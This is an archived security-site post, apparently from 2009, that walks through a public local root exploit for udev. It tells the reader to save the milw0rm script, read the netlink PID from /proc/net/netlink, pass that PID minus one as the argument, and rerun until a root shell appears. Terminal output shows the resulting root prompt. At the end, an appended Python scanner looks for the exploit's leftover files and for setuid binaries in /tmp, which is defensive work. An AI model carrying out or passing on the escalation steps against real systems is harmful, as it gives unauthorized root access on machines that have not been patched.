UDEV local overflow exploit, hands-on notes - Vulnerability warning - The Black Bar Safety Net

2009-06-07T00:00:00
ID MYHACK58:62200923470
Type myhack58
Reporter Anonymous
Modified 2009-06-07T00:00:00

Description

Author: professional owe money

The UDEV overflow vulnerability is getting a lot of attention at the moment. I ran the following test on a virtual machine and found that the exploit is indeed very easy to use. It looks like it works across a wide range of

1. Save <http://www.milw0rm.com/exploits/8478> as a shell script. The file name is arbitrary; for example, I later named it a.

2. Find the PID of udev's first socket. The following command lists it:

    cat /proc/net/netlink

3. Take the PID that appears in the first line, subtract 1, and use the result as the parameter. For example:

    sk       Eth Pid    Groups   Rmem     Wmem     Dump     Locks
    cfe9ce00 0   0      00000000 0        0        00000000

This PID is 0; subtracting 1 gives -1.

4. Run sh a -1 (if it fails, run it several more times).

The following is a successful run. (I failed N times and thought the system was not affected. Later I heard that 2.6 kernels are affected, so I tried a few more times and suddenly saw a cute # prompt. Excited!)

    bt tmp $ cat /proc/net/netlink
    sk       Eth Pid    Groups   Rmem     Wmem     Dump     Locks
    cfe9ce00 0   0      00000000 0        0        00000000 2
    cf8f3800 6   0      00000000 0        0        00000000 2
    cfa96400 8   0      00000000 0        0        00000000 2
    cfe13000 10  0      00000000 0        0        00000000 2
    cff57c00 12  0      00000000 0        0        00000000 2
    cfe9cc00 15  0      00000000 0        0        00000000 2
    cff57600 15  1060   00000001 0        0        00000000 2
    c12a3000 16  0      00000000 0        0        00000000 2
    c12a3200 18  0      00000000 0        0        00000000 2
    bt tmp $ sh a -1
    suid.c: In function 'main':
    suid.c:3: warning: incompatible implicit declaration of built-in function 'execl'
    /usr/lib/gcc/i486-slackware-linux/4.1.2/../../../../i486-slackware-linux/bin/ld: cannot open output file /tmp/suid: Permission denied
    collect2: ld returned 1 exit status
    cp: `libno_ex.so.1.0' and `/tmp/libno_ex.so.1.0' are the same file
    sh-3.1# id
    uid=0(root) gid=0(root) groups=10(wheel)
    sh-3.1# uname -a
    Linux bt 2.6.21.5 #4 SMP Thu Apr 10 04:23:56 GMT 2008 i686 Intel(R) Pentium(R) Dual CPU E2140 @ 1.60GHz GenuineIntel GNU/Linux

------------------------ The depressing dividing line ------------------------

Later I repeated the test dozens of times before it succeeded once.

    bt test $ bash b -1
    suid.c: In function 'main':
    suid.c:3: warning: incompatible implicit declaration of built-in function 'execl'
    sh-3.1$ exit        -----------> failed again
    exit
    bt test $ bash b -1
    suid.c: In function 'main':
    suid.c:3: warning: incompatible implicit declaration of built-in function 'execl'
    sh-3.1#             ---------------> successful
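
For defenders, the transcripts above show what a run leaves on disk: suid.c, a suid binary and libno_ex.so.1.0, with /tmp as the output location. The following sketch is an added example, not part of the original post; it flags those names and any setuid regular file under a directory, and the function name and the name list are assumptions drawn from the transcript.

```python
import os
import stat

# File names taken from the transcript above (the exploit's build products).
ARTIFACT_NAMES = {"suid", "suid.c"}
ARTIFACT_PREFIXES = ("libno_ex.so",)


def scan_for_artifacts(root="/tmp"):
    """Return a sorted list of (path, reasons) for files worth a closer look.

    Hypothetical helper: it only reports; it never deletes or modifies files.
    """
    findings = []
    # os.walk does not follow symlinked directories by default.
    for dirpath, _dirs, files in os.walk(root, onerror=lambda e: None):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)  # lstat: do not follow symlinks
            except OSError:
                continue  # file vanished or is unreadable
            if not stat.S_ISREG(st.st_mode):
                continue
            reasons = []
            if name in ARTIFACT_NAMES or name.startswith(ARTIFACT_PREFIXES):
                reasons.append("name matches transcript artifact")
            # A setuid file rarely belongs in a temporary directory.
            if st.st_mode & stat.S_ISUID:
                reasons.append("setuid bit set (owner uid %d)" % st.st_uid)
            if reasons:
                findings.append((path, reasons))
    return sorted(findings)


if __name__ == "__main__":
    for path, reasons in scan_for_artifacts():
        print(path, "->", "; ".join(reasons))
```

A name match alone is weak evidence, since the names are trivially changed; the setuid check and the owner uid are the more durable signals.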